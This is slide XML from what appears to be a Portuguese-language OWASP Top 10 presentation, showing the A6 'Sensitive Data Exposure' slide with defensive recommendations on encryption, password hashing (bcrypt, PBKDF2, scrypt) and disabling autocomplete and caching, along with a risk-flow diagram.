              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>do Top 10. Dito isto, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>no mínimo, faça todas as recomendações:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Considerando que você pretende proteger os dados de ameaças (como por exemplo, ataque </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>interno ou de usuário </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>externo), tenha a certeza de criptografar todos os dados sensíveis em repouso e em </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>trânsito de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uma forma que </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iniba </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>estas ameaças.</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Não armazene dados sensíveis desnecessariamente. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Descarte-os </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>o mais </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rápido possível. Dados </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>que você não tem não podem ser roubados.</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Certifique-se que o nível utilizado nos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>algoritmos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e chaves são fortes, e que o gerenciamento de chaves está aplicado adequadamente. Considere utilizar os </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>módulos criptográficos validados do FIPS-140</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Certifique-se que as senhas são armazenadas com um </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>algoritmo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>projetado especialmente para a proteção de senhas, como o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>bcrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>PBKDF2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ou </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>scrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Desabilite o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>autocompletar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>em formulários de coleta de dados </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sensí-veis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e desabilite o cache em páginas que contenham dados sensíveis.</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="42079"/>
            <a:ext cx="5486400" cy="762001"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Exposição de Dados Sensíveis</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text Placeholder 26"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-34120"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>A6</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29" name="Group 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-2975" y="980476"/>
            <a:ext cx="6688103" cy="480859"/>
            <a:chOff x="-2975" y="1014596"/>
            <a:chExt cx="6688103" cy="480859"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="30" name="Group 29"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-2975" y="1014596"/>
              <a:ext cx="6688103" cy="480859"/>
              <a:chOff x="-2975" y="997424"/>
              <a:chExt cx="6688103" cy="480859"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="50" name="Rectangle 116"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2879477" y="1073877"/>
                <a:ext cx="1020368" cy="381000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">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r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>       Vulnerabilidades</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>de Segurança</a:t>
                </a:r>
                <a:endParaRPr lang="pt-BR" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="51" name="Group 63"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="476250" y="997424"/>
                <a:ext cx="139700" cy="304800"/>
                <a:chOff x="96" y="1344"/>
                <a:chExt cx="288" cy="624"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="60" name="Oval 64"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="144" y="1344"/>
                  <a:ext cx="192" cy="192"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050" algn="ctr">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr eaLnBrk="0" hangingPunct="0"/>
                  <a:endParaRPr lang="pt-BR" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="61" name="Line 65"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1536"/>
                  <a:ext cx="0" cy="240"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="pt-BR" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="62" name="Line 66"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="96" y="1776"/>
                  <a:ext cx="144" cy="192"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="pt-BR" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="63" name="Line 67"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1776"/>
                  <a:ext cx="144" cy="192"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="pt-BR" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="64" name="Line 68"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="96" y="1632"/>
                  <a:ext cx="288" cy="0"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="pt-BR" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="52" name="AutoShape 163"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1309048" y="1078960"/>
                <a:ext cx="838200" cy="357187"/>
              </a:xfrm>
              <a:prstGeom prst="rightArrowCallout">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 20889"/>
                  <a:gd name="adj2" fmla="val 24667"/>
                  <a:gd name="adj3" fmla="val 34667"/>
                  <a:gd name="adj4" fmla="val 8013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r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Vetores </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>de Ataque</a:t>
                </a:r>
                <a:endParaRPr lang="pt-BR" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53" name="AutoShape 85"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4800600" y="1049628"/>
                <a:ext cx="685800" cy="428655"/>
              </a:xfrm>
              <a:prstGeom prst="can">
                <a:avLst>
                  <a:gd name="adj" fmla="val 250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defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>Impactos</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>Técnicos</a:t>
                </a:r>
                <a:endParaRPr lang="pt-BR" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="54" name="AutoShape 108"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="762000" y="1262418"/>
                <a:ext cx="534537" cy="1232"/>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55" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="2188570" y="1262418"/>
                <a:ext cx="630830" cy="1233"/>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56" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="50" idx="3"/>
                <a:endCxn id="53" idx="2"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="3899848" y="1263956"/>
                <a:ext cx="900752" cy="421"/>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sp>
            <p:nvSpPr>
              <p:cNvPr id="57" name="Rectangle 89"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="-2975" y="1280701"/>
                <a:ext cx="1132041" cy="194925"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Agentes de Ameaça</a:t>
                </a:r>
                <a:endParaRPr lang="pt-BR" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="58" name="AutoShape 142"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5923128" y="1073877"/>
                <a:ext cx="762000" cy="381000"/>
              </a:xfrm>
              <a:prstGeom prst="foldedCorner">
                <a:avLst>
                  <a:gd name="adj" fmla="val 125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t"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Impactos</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>no Negócio</a:t>
                </a:r>
                <a:endParaRPr lang="pt-BR" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="59" name="AutoShape 149"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="53" idx="4"/>
                <a:endCxn id="58" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5486400" y="1263956"/>
                <a:ext cx="436728" cy="421"/>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
          <p:nvSpPr>
            <p:cNvPr id="31" name="AutoShape 117"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2879480" y="1091049"/>
              <a:ext cx="220306" cy="381000"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrowCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 47538"/>
                <a:gd name="adj2" fmla="val 51293"/>
                <a:gd name="adj3" fmla="val 57006"/>
                <a:gd name="adj4" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>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eaLnBrk="0" hangingPunct="0"/>
              <a:endParaRPr lang="pt-BR" sz="900" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Rectangle 31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2861647" y="1235639"/>
              <a:ext cx="110153" cy="9514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grpSp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14263266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5" name="Table 104"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3682548526"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="948520"/>
          <a:ext cx="6858000" cy="2636224"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1277888"/>
                <a:gridCol w="1008112"/>
                <a:gridCol w="1143000"/>
